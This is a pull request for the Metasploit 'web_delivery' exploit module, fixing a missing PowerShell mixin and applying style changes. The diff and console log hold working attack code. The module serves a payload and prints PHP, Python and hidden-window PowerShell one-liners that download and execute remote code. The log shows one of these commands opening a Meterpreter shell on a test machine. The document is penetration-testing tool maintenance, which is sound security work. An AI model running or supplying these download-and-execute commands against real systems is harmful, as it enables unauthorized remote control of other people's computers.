### PR TITLE
Add PSH Requirements For web_delivery

### DIFF
--- a/modules/exploits/multi/script/web_delivery.rb
+++ b/modules/exploits/multi/script/web_delivery.rb
@@ -15,7 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
   def initialize(info = {})
     super(update_info(info,
       'Name'         => 'Script Web Delivery',
-      'Description'  => %q{
+      'Description'  => %q(
         This module quickly fires up a web server that serves a payload.
         The provided command will start the specified scripting language interpreter and then download and execute the
         payload. The main purpose of this module is to quickly establish a session on a target
@@ -25,13 +25,13 @@ class Metasploit3 < Msf::Exploit::Remote
         escalations supplied by Meterpreter. When using either of the PSH targets, ensure the
         payload architecture matches the target computer or use SYSWOW64 powershell.exe to execute
         x86 payloads on x64 machines.
-      },
+      ),
       'License'      => MSF_LICENSE,
       'Author'       =>
         [
           'Andrew Smith "jakx" <jakx.ppr@gmail.com>',
           'Ben Campbell',
-          'Chris Campbell' #@obscuresec - Inspiration n.b. no relation!
+          'Chris Campbell' # @obscuresec - Inspiration n.b. no relation!
         ],
       'DefaultOptions' =>
         {
@@ -39,12 +39,12 @@ class Metasploit3 < Msf::Exploit::Remote
         },
       'References'     =>
         [
-          [ 'URL', 'http://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'],
-          [ 'URL', 'http://www.pentestgeek.com/2013/07/19/invoke-shellcode/' ],
-          [ 'URL', 'http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/'],
-          [ 'URL', 'http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html']
+          ['URL', 'http://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'],
+          ['URL', 'http://www.pentestgeek.com/2013/07/19/invoke-shellcode/'],
+          ['URL', 'http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/'],
+          ['URL', 'http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html']
         ],
-      'Platform'       => %w{python php win},
+      'Platform'       => %w(python php win),
       'Targets'        =>
         [
           ['Python', {
@@ -62,38 +62,38 @@ class Metasploit3 < Msf::Exploit::Remote
           ['PSH_x64', {
             'Platform' => 'win',
             'Arch' => ARCH_X86_64
-          }],
+          }]
         ],
       'DefaultTarget'  => 0,
       'DisclosureDate' => 'Jul 19 2013'
     ))
   end
 
-  def on_request_uri(cli, request)
-    print_status("Delivering Payload")
-    if (target.name.include? "PSH")
+  def on_request_uri(cli, _request)
+    print_status('Delivering Payload')
+    if target.name.include? 'PSH'
       data = Msf::Util::EXE.to_win32pe_psh_net(framework, payload.encoded)
     else
-      data = %Q|#{payload.encoded} |
+      data = %Q(#{payload.encoded} )
     end
-    send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
+    send_response(cli, data,  'Content-Type' => 'application/octet-stream')
   end
 
   def primer
-    url = get_uri()
-    print_status("Run the following command on the target machine:")
+    url = get_uri
+    print_status('Run the following command on the target machine:')
     case target.name
-    when "PHP"
+    when 'PHP'
       print_line("php -d allow_url_fopen=true -r \"eval(file_get_contents('#{url}'));\"")
-    when "Python"
+    when 'Python'
       print_line("python -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"")
-    when "PSH_x86", "PSH_x64"
+    when 'PSH_x86', 'PSH_x64'
       download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))"
-      print_line generate_psh_command_line({
-                                     :noprofile => true,
-                                     :windowstyle => 'hidden',
-                                     :command => download_and_run
-                                 })
+      print_line generate_psh_command_line(
+                                             noprofile: true,
+                                             windowstyle: 'hidden',
+                                             command: download_and_run
+                                           )
     end
   end
 end

--- a/modules/exploits/multi/script/web_delivery.rb
+++ b/modules/exploits/multi/script/web_delivery.rb
@@ -4,10 +4,12 @@
 ##
 
 require 'msf/core'
+require 'msf/core/exploit/powershell'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = ManualRanking
 
+  include Msf::Exploit::Powershell
   include Msf::Exploit::Remote::HttpServer
 
   def initialize(info = {})


### PR DESCRIPTION
The recent modification to the `multi/script/web_delivery` module (in commit b0a596b4a1f6e01efc8e94000c701caf8c74b17f) has caused an error to be raised when using either of the PSH targets due to the undefined method `generate_psh_command_line`. This PR fixes the issue and applies some rubocop changes.

Before:

```
msf exploit(web_delivery) > exploit
[*] Exploit running as background job.

[*] Using URL: http://192.168.90.170:8080/m9ASvu
[*] Server started.
[*] Run the following command on the target machine:
[-] Exploit failed: NoMethodError undefined method `generate_psh_command_line' for #<Msf::Modules::Mod6578706c6f69742f6d756c74692f7363726970742f7765625f64656c6976657279::Metasploit3:0x0000000e08acb0>
[*] Server stopped.
```

After:

```
msf-git (S:0 J:0) exploit(web_delivery) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.90.1:4444 
msf-git (S:0 J:1) exploit(web_delivery) > [*] Using URL: http://0.0.0.0:8080/Qlh2XWUkvq7TSw
[*]  Local IP: http://192.168.90.1:8080/Qlh2XWUkvq7TSw
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://192.168.90.1:8080/Qlh2XWUkvq7TSw'))

msf-git (S:0 J:1) exploit(web_delivery) > 
[*] 192.168.90.131   web_delivery - Delivering Payload
[*] Sending stage (769536 bytes) to 192.168.90.131
[*] Meterpreter session 1 opened (192.168.90.1:4444 -> 192.168.90.131:49161) at 2014-07-31 16:13:28 -0400

msf-git (S:1 J:1) exploit(web_delivery) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: WIN-82GTIDG995P\tester
```

Tasks:
- [x] Run the old module with a PSH target, see the error
- [x] Run the module with the changes, see no errors and get a shell

CC: @Meatballs1
